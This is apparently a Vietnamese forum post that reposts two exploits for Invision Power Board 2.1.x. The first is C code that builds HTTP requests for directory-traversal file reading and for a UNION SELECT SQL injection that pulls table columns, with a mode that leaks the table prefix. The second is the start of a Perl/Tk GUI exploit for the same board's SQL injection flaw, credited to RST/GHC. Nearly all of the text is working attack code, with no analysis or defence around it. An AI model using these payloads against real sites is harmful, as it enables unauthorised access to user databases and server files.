Trang 1char * localfile = argv[5];
char * host = argv[3];
if (strcmp(type,"1")==0)
{
char exploit[1024];
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit,
"?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=");
strcat(exploit, localfile);
strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
Exploit(exploit, "readfile", host);
}
else if (strcmp(type,"2")==0)
{
char exploit[1024];
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit, "?act=gallery&code=viewimage&img=index.gif&dir="); strcat(exploit, localfile);
Trang 2strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
Exploit(exploit, "readfile", host);
}
// - sql-injection exploit - //
}
if(strcmp(mode,"sqlinject")==0)
{
char * host = argv[2];
char * path = argv[3];
char * prefix = argv[5];
char * column = argv[4];
char * table = argv[6];
char * id = argv[7];
char exploit[1024];
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit,
"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
Trang 3strcat(exploit, column);
strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20"); strcat(exploit, prefix);
strcat(exploit, table);
strcat(exploit, "%20WHERE%20id=");
strcat(exploit, id);
strcat(exploit, "/*31337*/");
strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
Exploit(exploit, "sqlinject", host);
}
if (strcmp(mode,"getprefix")==0)
{
char * path = argv[3];
char * host = argv[2];
char exploit[1024];
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit,
"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew");
strcat(exploit, " HTTP/1.0\r\nHost: ");
Trang 4strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
printf("\n\n\n[!] u can get database prefix from this error example: SELECT * FROM <PREFIX>gallery_albums\n\n");
Exploit(exploit, "readfile", host);
}
WSACleanup();
return 0;
}
// milw0rm.com [2006-10-03]
Chú ý code nên để trong tab [code] [_/code]
famydmx(HCE)
Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit
Code:
#!/usr/bin/perl
## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
# Create the Tk top-level window for the GUI. `$mw` is assigned without `my`,
# so it is a package global; no `use strict` / `use warnings` appears in the
# preamble visible above.
# NOTE(review): `new MainWindow(...)` is indirect-object syntax, which Perl can
# mis-parse; `MainWindow->new(...)` is the unambiguous spelling.
$mw = new MainWindow(title => "r57ipb216gui" );
# Fix the window at 420x550 and disable resizing on both axes.
$mw->geometry ( '420x550' ) ;
$mw->resizable(0,0);
# Header row: a single '!' rendered in the Webdings font at size 22.
$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
# Banner label in bold red Verdana naming the affected releases
# (Invision Power Board 2.1.* up to and including 2.1.6).
$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();